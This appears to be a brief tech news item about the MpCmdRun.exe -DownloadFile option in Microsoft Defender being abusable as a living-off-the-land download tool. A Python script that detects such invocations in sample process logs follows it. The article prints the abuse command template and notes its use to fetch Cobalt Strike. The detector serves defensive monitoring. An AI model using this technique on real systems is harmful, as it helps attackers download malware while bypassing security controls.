According to a TechRadar report, Microsoft added the ability to download files from the command line in version 4.18.2007.9 or 4.18.2009.9 of Microsoft Defender. However, according to penetration tester Mohammad Askar, this change to the Microsoft Defender command-line tool may allow attackers to use it to download malicious programs.
Naijatechnews has learned that Windows 10 contains many LOLBins (living-off-the-land binaries), all of which have legitimate functions. However, with appropriate privileges, hackers can abuse these binaries to bypass security controls and conduct attacks without alerting the victim.
As stated by Askar, the Microsoft Defender command-line tool now supports the new “-DownloadFile” option. An attacker can use the Microsoft Anti-Malware Service command-line utility to download files from the Internet with the following command: “MpCmdRun.exe -DownloadFile -url <url> -path <local-path>”.
In this way, Askar was able to download the Cobalt Strike malware from a remote location directly through Microsoft Defender.
Although Defender can detect and mitigate any malicious files downloaded using this method, it is not clear whether other popular antivirus services can defend against this attack method when native protection is disabled.
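A detection check for the command line described above, as an added example that is not part of the original article: it scans process-creation records for MpCmdRun.exe invoked with -DownloadFile and extracts the URL and destination path. The event records, hosts, users and URLs are constructed, and matching switches case-insensitively is an assumption made to be conservative.

```python
import ntpath
import shlex

# Constructed process-creation records; hosts, users, URLs and paths are made up.
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "alice",
     "cmdline": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1'},
    {"host": "ws-02", "user": "bob",
     "cmdline": r'MpCmdRun.exe -DownloadFile -url https://files.example.test/a.bin '
                r'-path C:\Users\Public\a.bin'},
    {"host": "ws-03", "user": "carol",
     "cmdline": r'"C:\Program Files\Windows Defender\mpcmdrun.exe" -downloadfile '
                r'-URL "http://files.example.test/b.exe" -Path "C:\Temp\my file.exe"'},
    # Name and switch appear only inside another program's arguments: must not match.
    {"host": "ws-04", "user": "dave",
     "cmdline": r'notepad.exe C:\notes\MpCmdRun.exe -DownloadFile.txt'},
]


def tokenize(cmdline):
    """Split a Windows command line, keeping backslashes and unquoting tokens."""
    try:
        parts = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: fall back to whitespace splitting
        parts = cmdline.split()
    return [p.strip('"') for p in parts]


def switch_value(tokens, name):
    """Return the token that follows switch `name` (case-insensitive), else None."""
    lowered = [t.lower() for t in tokens]
    if name in lowered and lowered.index(name) + 1 < len(tokens):
        return tokens[lowered.index(name) + 1]
    return None


def detect_download(event):
    """Flag MpCmdRun.exe run with -DownloadFile; return a finding dict or None."""
    tokens = tokenize(event["cmdline"])
    if not tokens or ntpath.basename(tokens[0]).lower() != "mpcmdrun.exe":
        return None
    if "-downloadfile" not in [t.lower() for t in tokens[1:]]:
        return None
    return {"host": event["host"], "user": event["user"],
            "url": switch_value(tokens, "-url"),
            "path": switch_value(tokens, "-path")}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        finding = detect_download(ev)
        if finding:
            print("ALERT", finding)
```

The check keys on the process image name in the first token, so a record whose arguments merely mention the binary is not flagged.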